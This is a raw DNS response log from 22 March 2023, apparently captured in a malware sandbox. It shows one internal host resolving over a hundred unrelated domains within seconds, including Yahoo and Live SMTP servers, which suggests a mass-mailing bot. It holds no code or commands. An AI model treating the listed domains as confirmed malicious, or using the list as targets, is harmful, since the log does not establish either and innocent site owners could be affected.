Mar 22, 2023 05:44:36.273607016 CET	8.8.8.8	192.168.2.5	0x4875	No error (0)	sidepath.com		34.193.69.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.273607016 CET	8.8.8.8	192.168.2.5	0x4875	No error (0)	sidepath.com		34.193.204.92	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.559645891 CET	8.8.8.8	192.168.2.5	0x4d77	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.568732023 CET	8.8.8.8	192.168.2.5	0x7f01	No error (0)	dataform.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.585459948 CET	8.8.8.8	192.168.2.5	0xb17c	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.599534035 CET	8.8.8.8	192.168.2.5	0x4ea0	No error (0)	smtp.mail.yahoo.com	smtp.mail.global.gm0.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:36.599534035 CET	8.8.8.8	192.168.2.5	0x4ea0	No error (0)	smtp.mail.global.gm0.yahoodns.net		87.248.97.36	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.622483015 CET	8.8.8.8	192.168.2.5	0x8606	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.622483015 CET	8.8.8.8	192.168.2.5	0x8606	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.809571028 CET	8.8.8.8	192.168.2.5	0x8221	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.834404945 CET	8.8.8.8	192.168.2.5	0x176b	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.834404945 CET	8.8.8.8	192.168.2.5	0x176b	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:36.874804020 CET	8.8.8.8	192.168.2.5	0x6af2	No error (0)	ossir.org		51.159.3.117	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.089302063 CET	8.8.8.8	192.168.2.5	0x39a9	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:37.089302063 CET	8.8.8.8	192.168.2.5	0x39a9	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.105526924 CET	8.8.8.8	192.168.2.5	0xb130	No error (0)	sokuwan.net		185.230.63.186	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.105526924 CET	8.8.8.8	192.168.2.5	0xb130	No error (0)	sokuwan.net		185.230.63.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.105526924 CET	8.8.8.8	192.168.2.5	0xb130	No error (0)	sokuwan.net		185.230.63.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.105623960 CET	8.8.8.8	192.168.2.5	0x60f1	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.127569914 CET	8.8.8.8	192.168.2.5	0xb7c9	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.178375959 CET	8.8.8.8	192.168.2.5	0x57b5	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.342396021 CET	8.8.8.8	192.168.2.5	0xbbec	No error (0)	gujarat.com		172.67.145.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.342396021 CET	8.8.8.8	192.168.2.5	0xbbec	No error (0)	gujarat.com		104.21.73.143	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.596277952 CET	8.8.8.8	192.168.2.5	0x95d1	No error (0)	anduran.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:37.596277952 CET	8.8.8.8	192.168.2.5	0x95d1	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:37.596277952 CET	8.8.8.8	192.168.2.5	0x95d1	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.596277952 CET	8.8.8.8	192.168.2.5	0x95d1	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.643374920 CET	8.8.8.8	192.168.2.5	0x8bfb	No error (0)	komie.com		59.106.13.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.649332047 CET	8.8.8.8	192.168.2.5	0xf911	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.671360016 CET	8.8.8.8	192.168.2.5	0x6f24	Server failure (2)	webband.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.760909081 CET	8.8.8.8	192.168.2.5	0xa51f	No error (0)	vivastay.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:37.760909081 CET	8.8.8.8	192.168.2.5	0xa51f	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:37.760909081 CET	8.8.8.8	192.168.2.5	0xa51f	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.760909081 CET	8.8.8.8	192.168.2.5	0xa51f	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.835251093 CET	8.8.8.8	192.168.2.5	0x26d3	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:37.925970078 CET	8.8.8.8	192.168.2.5	0x3709	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.001939058 CET	8.8.8.8	192.168.2.5	0x8f2e	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.183520079 CET	8.8.8.8	192.168.2.5	0x2583	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.464062929 CET	8.8.8.8	192.168.2.5	0x7ede	No error (0)	kustnara.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.464062929 CET	8.8.8.8	192.168.2.5	0x7ede	No error (0)	kustnara.com		76.223.27.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.464062929 CET	8.8.8.8	192.168.2.5	0x7ede	No error (0)	kustnara.com		13.248.155.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.464062929 CET	8.8.8.8	192.168.2.5	0x7ede	No error (0)	kustnara.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.542938948 CET	8.8.8.8	192.168.2.5	0xbc16	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.581756115 CET	8.8.8.8	192.168.2.5	0x7673	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.640336037 CET	8.8.8.8	192.168.2.5	0x3646	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.693753004 CET	8.8.8.8	192.168.2.5	0x359c	No error (0)	geecl.com		213.175.217.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:38.785787106 CET	8.8.8.8	192.168.2.5	0xc097	No error (0)	softizer.com		185.163.45.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.014467001 CET	8.8.8.8	192.168.2.5	0xa0a1	No error (0)	tbvlugus.nl		174.129.25.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.187329054 CET	8.8.8.8	192.168.2.5	0x50fb	No error (0)	gphpedit.org		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.504448891 CET	8.8.8.8	192.168.2.5	0x454a	No error (0)	shanks.co.uk		217.19.254.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.512324095 CET	8.8.8.8	192.168.2.5	0xfb05	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.527343988 CET	8.8.8.8	192.168.2.5	0xf7e5	No error (0)	t-trust.jp		183.181.82.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.539700031 CET	8.8.8.8	192.168.2.5	0xb019	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.560117006 CET	8.8.8.8	192.168.2.5	0xd3b4	No error (0)	cyclad.pl		87.98.236.253	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.592194080 CET	8.8.8.8	192.168.2.5	0x542d	No error (0)	kewlmail.com		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.643582106 CET	8.8.8.8	192.168.2.5	0xe241	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.673084021 CET	8.8.8.8	192.168.2.5	0x1900	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.776957989 CET	8.8.8.8	192.168.2.5	0x653d	No error (0)	juso-gr.ch		172.67.163.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.776957989 CET	8.8.8.8	192.168.2.5	0x653d	No error (0)	juso-gr.ch		104.21.50.140	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:39.842111111 CET	8.8.8.8	192.168.2.5	0x4c89	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.318974018 CET	8.8.8.8	192.168.2.5	0x4804	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.359167099 CET	8.8.8.8	192.168.2.5	0x33a6	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.372363091 CET	8.8.8.8	192.168.2.5	0xe9b4	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381326914 CET	8.8.8.8	192.168.2.5	0x7f29	No error (0)	gbmfg.com		151.101.2.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381326914 CET	8.8.8.8	192.168.2.5	0x7f29	No error (0)	gbmfg.com		151.101.66.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381326914 CET	8.8.8.8	192.168.2.5	0x7f29	No error (0)	gbmfg.com		151.101.130.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381326914 CET	8.8.8.8	192.168.2.5	0x7f29	No error (0)	gbmfg.com		151.101.194.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381767035 CET	8.8.8.8	192.168.2.5	0x751b	No error (0)	vvsteknik.dk		185.31.76.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381823063 CET	8.8.8.8	192.168.2.5	0x994c	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381823063 CET	8.8.8.8	192.168.2.5	0x994c	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381823063 CET	8.8.8.8	192.168.2.5	0x994c	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.381823063 CET	8.8.8.8	192.168.2.5	0x994c	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.387852907 CET	8.8.8.8	192.168.2.5	0x4f07	No error (0)	beafin.com		133.125.38.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.404824018 CET	8.8.8.8	192.168.2.5	0xc470	No error (0)	deckoviny.cz		88.86.118.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.412344933 CET	8.8.8.8	192.168.2.5	0x8aee	No error (0)	cjborden.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.412344933 CET	8.8.8.8	192.168.2.5	0x8aee	No error (0)	cjborden.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.428904057 CET	8.8.8.8	192.168.2.5	0xef43	No error (0)	lyto.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.428904057 CET	8.8.8.8	192.168.2.5	0xef43	No error (0)	lyto.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.439732075 CET	8.8.8.8	192.168.2.5	0x142f	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.439732075 CET	8.8.8.8	192.168.2.5	0x142f	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.447287083 CET	8.8.8.8	192.168.2.5	0xf6c1	No error (0)	kayoaiba.com		154.213.117.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.453238964 CET	8.8.8.8	192.168.2.5	0x2b17	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.457048893 CET	8.8.8.8	192.168.2.5	0x183e	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.545429945 CET	8.8.8.8	192.168.2.5	0x3f5	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.545454979 CET	8.8.8.8	192.168.2.5	0xe62a	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.564601898 CET	8.8.8.8	192.168.2.5	0x7716	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.614752054 CET	8.8.8.8	192.168.2.5	0xe385	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.623106956 CET	8.8.8.8	192.168.2.5	0x66bc	No error (0)	cpmteam.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.623106956 CET	8.8.8.8	192.168.2.5	0x66bc	No error (0)	cpmteam.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.641053915 CET	8.8.8.8	192.168.2.5	0x6717	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.646928072 CET	8.8.8.8	192.168.2.5	0x2966	No error (0)	mackusick.com		217.160.0.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.676110983 CET	8.8.8.8	192.168.2.5	0x906a	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.770668030 CET	8.8.8.8	192.168.2.5	0x4e25	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.773560047 CET	8.8.8.8	192.168.2.5	0x95f7	No error (0)	canasil.com		104.26.3.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.773560047 CET	8.8.8.8	192.168.2.5	0x95f7	No error (0)	canasil.com		104.26.2.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.773560047 CET	8.8.8.8	192.168.2.5	0x95f7	No error (0)	canasil.com		172.67.68.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.808018923 CET	8.8.8.8	192.168.2.5	0x6f50	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.854017019 CET	8.8.8.8	192.168.2.5	0xd4f9	No error (0)	nekono.net		202.172.28.187	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.870817900 CET	8.8.8.8	192.168.2.5	0xe95f	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.870817900 CET	8.8.8.8	192.168.2.5	0xe95f	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.889791965 CET	8.8.8.8	192.168.2.5	0x77ff	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.904026985 CET	8.8.8.8	192.168.2.5	0x9d59	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:40.924741030 CET	8.8.8.8	192.168.2.5	0xb606	No error (0)	peminet.net		198.54.117.242	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.011598110 CET	8.8.8.8	192.168.2.5	0xfb91	No error (0)	wahw.com.au		54.194.190.151	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.066351891 CET	8.8.8.8	192.168.2.5	0x7fe2	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.077991009 CET	8.8.8.8	192.168.2.5	0xd913	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.077991009 CET	8.8.8.8	192.168.2.5	0xd913	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.083720922 CET	8.8.8.8	192.168.2.5	0xee90	No error (0)	mackusick.de		217.160.0.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.123351097 CET	8.8.8.8	192.168.2.5	0x1627	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.123711109 CET	8.8.8.8	192.168.2.5	0x82ea	No error (0)	magicomm.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.124578953 CET	8.8.8.8	192.168.2.5	0x3700	No error (0)	techtrans.de		185.237.66.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.138266087 CET	8.8.8.8	192.168.2.5	0xcb10	No error (0)	unicus.jp		49.212.232.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.144637108 CET	8.8.8.8	192.168.2.5	0xefc7	No error (0)	vonparis.com		23.185.0.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.186274052 CET	8.8.8.8	192.168.2.5	0x3d44	No error (0)	assideum.com		52.219.177.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.188324928 CET	8.8.8.8	192.168.2.5	0xb65e	No error (0)	oh28ya.com		18.176.155.206	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.188324928 CET	8.8.8.8	192.168.2.5	0xb65e	No error (0)	oh28ya.com		54.248.94.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.188618898 CET	8.8.8.8	192.168.2.5	0x10c6	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.196799994 CET	8.8.8.8	192.168.2.5	0xfa73	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.198357105 CET	8.8.8.8	192.168.2.5	0xcd9	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.198357105 CET	8.8.8.8	192.168.2.5	0xcd9	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.269767046 CET	8.8.8.8	192.168.2.5	0xc685	No error (0)	amerifor.com		64.18.191.61	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.273647070 CET	8.8.8.8	192.168.2.5	0xb2b	No error (0)	fortknox.bm		216.177.137.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.317724943 CET	8.8.8.8	192.168.2.5	0x6f6a	No error (0)	sidepath.com		34.193.204.92	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.317724943 CET	8.8.8.8	192.168.2.5	0x6f6a	No error (0)	sidepath.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.317724943 CET	8.8.8.8	192.168.2.5	0x6f6a	No error (0)	sidepath.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.317724943 CET	8.8.8.8	192.168.2.5	0x6f6a	No error (0)	sidepath.com		34.193.69.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.326764107 CET	8.8.8.8	192.168.2.5	0x57e6	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.327111959 CET	8.8.8.8	192.168.2.5	0x6c94	No error (0)	keio-web.com		219.94.128.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.327156067 CET	8.8.8.8	192.168.2.5	0xd341	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.327256918 CET	8.8.8.8	192.168.2.5	0xe9c0	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.329433918 CET	8.8.8.8	192.168.2.5	0xc127	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.368773937 CET	8.8.8.8	192.168.2.5	0xd2db	Name error (3)	chzko.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.388315916 CET	8.8.8.8	192.168.2.5	0xdb16	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.396419048 CET	8.8.8.8	192.168.2.5	0xa31c	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.396759987 CET	8.8.8.8	192.168.2.5	0xf9d4	No error (0)	indonesiamedia.com		74.208.215.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.418189049 CET	8.8.8.8	192.168.2.5	0xfa8a	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.423835039 CET	8.8.8.8	192.168.2.5	0xcdb7	No error (0)	shiner.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.423835039 CET	8.8.8.8	192.168.2.5	0xcdb7	No error (0)	shiner.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.425614119 CET	8.8.8.8	192.168.2.5	0xc3a7	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.508843899 CET	8.8.8.8	192.168.2.5	0xb4fb	No error (0)	gphpedit.org		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.533068895 CET	8.8.8.8	192.168.2.5	0x2823	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.533068895 CET	8.8.8.8	192.168.2.5	0x2823	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.648710966 CET	8.8.8.8	192.168.2.5	0xf93b	No error (0)	gphpedit.org		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.721311092 CET	8.8.8.8	192.168.2.5	0x418e	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.776436090 CET	8.8.8.8	192.168.2.5	0xd0f4	No error (0)	holp-ai.com		59.106.13.169	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.787153006 CET	8.8.8.8	192.168.2.5	0xe6a7	No error (0)	smtp.live.com	a-0010.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:41.841981888 CET	8.8.8.8	192.168.2.5	0x9dc8	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.884587049 CET	8.8.8.8	192.168.2.5	0x1507	No error (0)	rokoron.com		211.13.204.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.956304073 CET	8.8.8.8	192.168.2.5	0x7aee	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:41.956304073 CET	8.8.8.8	192.168.2.5	0x7aee	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.048363924 CET	8.8.8.8	192.168.2.5	0x92ba	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:42.048363924 CET	8.8.8.8	192.168.2.5	0x92ba	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.157500029 CET	8.8.8.8	192.168.2.5	0xe7a2	No error (0)	simetar.com		104.21.79.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.157500029 CET	8.8.8.8	192.168.2.5	0xe7a2	No error (0)	simetar.com		172.67.146.154	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.169378996 CET	8.8.8.8	192.168.2.5	0x6970	Name error (3)	polprime.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.171354055 CET	8.8.8.8	192.168.2.5	0xf90	No error (0)	dataform.co.uk		83.223.113.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.171482086 CET	8.8.8.8	192.168.2.5	0x1d55	No error (0)	clinicasanluis.com.co		172.67.164.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.171482086 CET	8.8.8.8	192.168.2.5	0x1d55	No error (0)	clinicasanluis.com.co		104.21.66.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.178462982 CET	8.8.8.8	192.168.2.5	0x864a	No error (0)	sanfotek.net		97.74.42.79	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.191934109 CET	8.8.8.8	192.168.2.5	0xb5ba	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.196249008 CET	8.8.8.8	192.168.2.5	0x4ee4	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.196249008 CET	8.8.8.8	192.168.2.5	0x4ee4	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.197325945 CET	8.8.8.8	192.168.2.5	0xd792	No error (0)	muhr-soehne.de		5.189.171.125	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.220766068 CET	8.8.8.8	192.168.2.5	0x34f8	No error (0)	daytonir.com		104.18.40.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.220766068 CET	8.8.8.8	192.168.2.5	0x34f8	No error (0)	daytonir.com		172.64.147.213	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.222791910 CET	8.8.8.8	192.168.2.5	0x6141	No error (0)	hyab.se		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.222791910 CET	8.8.8.8	192.168.2.5	0x6141	No error (0)	hyab.se		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.224334002 CET	8.8.8.8	192.168.2.5	0x6c9	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.224900961 CET	8.8.8.8	192.168.2.5	0x81fa	No error (0)	flamingorecordings.com		35.214.171.193	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.236463070 CET	8.8.8.8	192.168.2.5	0x213b	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.249738932 CET	8.8.8.8	192.168.2.5	0x5207	No error (0)	top1oil.com		172.67.71.55	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.249738932 CET	8.8.8.8	192.168.2.5	0x5207	No error (0)	top1oil.com		104.26.1.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.249738932 CET	8.8.8.8	192.168.2.5	0x5207	No error (0)	top1oil.com		104.26.0.82	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.254100084 CET	8.8.8.8	192.168.2.5	0xa9e3	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:42.274832010 CET	8.8.8.8	192.168.2.5	0x4e28	No error (0)	cbaben.com		173.205.126.33	A (IP address)	IN (0x0001)	false
